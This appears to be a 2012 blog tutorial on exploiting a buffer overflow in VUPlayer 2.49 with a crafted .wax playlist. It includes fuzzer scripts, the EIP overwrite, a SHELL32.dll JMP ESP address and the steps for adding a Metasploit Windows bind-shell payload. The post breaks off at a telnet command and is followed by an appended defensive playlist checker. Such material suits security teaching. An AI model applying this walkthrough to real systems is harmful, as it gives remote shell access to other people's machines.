Tuesday, 14 February 2012


DIRECT RETURN - EXPLOIT VU-PLAYER
BUFFER OVERFLOW


Before we exploit our target, we first set it up. Here the target is the application VU-Player version 2.49.

Below is a picture of the application we will exploit.
After that we look at where in the application we can feed the output of the fuzzer.
For example, through Open Playlist we can load a file that contains a long string of A characters (AAAAAAAAAAAAA) in place of the mp3 entry, saved with any of the extensions .wax, .m3u, .vpl, .pls, .asx, and .cue.


Alternatively, this can be found through the mini control of the visual.
Then we start creating the file; here we choose only the .wax extension, but use whichever you want .....
You can type the following script.

#!/usr/bin/python
# name of the playlist file the player will open
filename = 'lagi patah hati.wax'
# 1000 'A' characters (0x41) as the fuzzing input
buffer = '\x41' * 1000
# open for writing ('w'); the original 'write' is not a valid mode
f = open(filename, 'w')
f.write(buffer)
f.close()

When the file contains the 1000 A characters and has the .wax extension, open it directly in the VUPlayer application and check whether the application exits, crashes or hangs.
If it does not, just increase the buffer; how much you add to make the application crash is up to you, but do not overdo it.

Here we use a buffer of only 5000 bytes, as in the script below,

#!/usr/bin/python
# same playlist file name as before
filename = 'lagi patah hati.wax'
# buffer increased to 5000 'A' characters (0x41)
buffer = '\x41' * 5000
# open for writing ('w'); the original 'write' is not a valid mode
f = open(filename, 'w')
f.write(buffer)
f.close()

When it crashes, we proceed to the next step: running the application in OllyDbg.
You can share the fuzzer result file with the Windows XP machine by enabling SSH, Apache and MySQL on your BackTrack and opening a browser on Windows XP at the IP address of the BackTrack machine.
Then open OllyDbg, run the VUPlayer application and play the fuzzer file named
lagi patah hati.wax,
so that it appears as shown below.
Here the EIP register has been overwritten with 414141414141.

Then create a string of 5000 characters, the same as the buffer size in the earlier script, with the command
./pattern_create.rb 5000
and copy it into the fuzzer, following the instructions below.

After that, run the fuzzer file in the same way as above.
Here we begin to calculate the EIP and ESP values with the following command.
Below we can see that in the 3000 buffer it was replaced with 417, plus the line
buffer += '\xEF\xBE\xAD\xDE' after it, and then saved.

Then run the fuzzer with the same process as above.
Below it shows that the value in the EIP register has become DEADBEEF,
and it is trying to write to ESP.

Then add buffer += '\xCC' * 1000; this will overwrite the value at the ESP register.
Run again in the same way as above.
Below we can see that it was hit with CCCCCCCCCC.

The next stage is to find a JMP ESP in the application's memory: click View --> Executable modules, then double-click SHELL32.dll,
then right-click and select Search for --> Command, or press Ctrl+F directly on the keyboard.
Type JMP ESP as below and click Find.
In the result we can see that JMP ESP is at 7C9D30D7, and we write it into the fuzzer script as buffer += '\xD7\x30\x9D\x7C'.
Then run again with the same process as above, and we get a result like the one below.
Now we try a breakpoint here to find out whether the EIP register reaches the address 7C9D30D7,
and below are the results.
Now we proceed to make the PAYLOAD.
In the browser, type the address 127.0.0.1:55555,
then click Payload, select the category os: win32, and then select Windows Shell Bind.

Then fill in the fields as below.
Below we can see the PAYLOAD that we made earlier,
and we copy the payload into our fuzzer script as below.
Then run the fuzzer result again; when the application simply exits, it still does not work, so we think about what is missing from the script above.
Let's go back to making the payload; maybe something is wrong with the payload.

Making it is still the same as above; we actually just regenerate it, because every payload we make does not necessarily have the same contents.

Then we copy our payload into the fuzzer and run the fuzzer result again.
When successful, the application will hang and you cannot click on the application's menu;
for example, the following picture shows the application hanging.


When it looks like the above, you can connect with Telnet using the following command
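As an added defensive example, not part of the original post, here is a small checker that flags playlist files shaped like the crafted .wax file in this tutorial: an entry far longer than any real path or URL, or one carrying non-printable bytes such as a raw return address. The 1024-byte threshold, the helper names and the two sample playlists are assumptions.

```python
#!/usr/bin/env python3
# Added example, not from the original post: flag playlist files that look
# like the crafted .wax file (oversized entry and/or raw non-printable bytes).

import os
import string

# Playlist extensions the post lists as accepted by VUPlayer's Open Playlist.
PLAYLIST_EXTENSIONS = ('.wax', '.m3u', '.vpl', '.pls', '.asx', '.cue')

MAX_ENTRY_LEN = 1024                        # assumed upper bound for a path/URL
PRINTABLE = set(string.printable.encode())  # printable ASCII as byte values


def has_playlist_extension(name):
    """True if the file name ends in one of the playlist extensions above."""
    return os.path.splitext(name)[1].lower() in PLAYLIST_EXTENSIONS


def check_playlist(data):
    """Return (line_no, reason) findings for the raw bytes of a playlist."""
    findings = []
    for no, line in enumerate(data.splitlines(), 1):
        if len(line) > MAX_ENTRY_LEN:
            findings.append((no, 'entry length %d exceeds %d'
                             % (len(line), MAX_ENTRY_LEN)))
        bad = [b for b in line if b not in PRINTABLE]
        if bad:
            findings.append((no, '%d non-printable bytes' % len(bad)))
    return findings


def is_suspicious(name, data):
    """Only playlist-typed files are checked; anything else is ignored."""
    return has_playlist_extension(name) and bool(check_playlist(data))


# Constructed samples: a normal playlist, and one shaped like the fuzzer
# output (5000 'A's followed by the DEADBEEF marker the post writes into EIP).
BENIGN = b'C:\\Music\\song.mp3\r\nhttp://example.invalid/stream.mp3\r\n'
CRAFTED = b'A' * 5000 + b'\xEF\xBE\xAD\xDE'

if __name__ == '__main__':
    for name, sample in (('playlist.wax', BENIGN),
                         ('lagi patah hati.wax', CRAFTED)):
        print(name, check_playlist(sample))
```

Run against a directory of playlist files, this gives a cheap triage signal before a file ever reaches the player; it is a heuristic, not a proof of exploitation.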


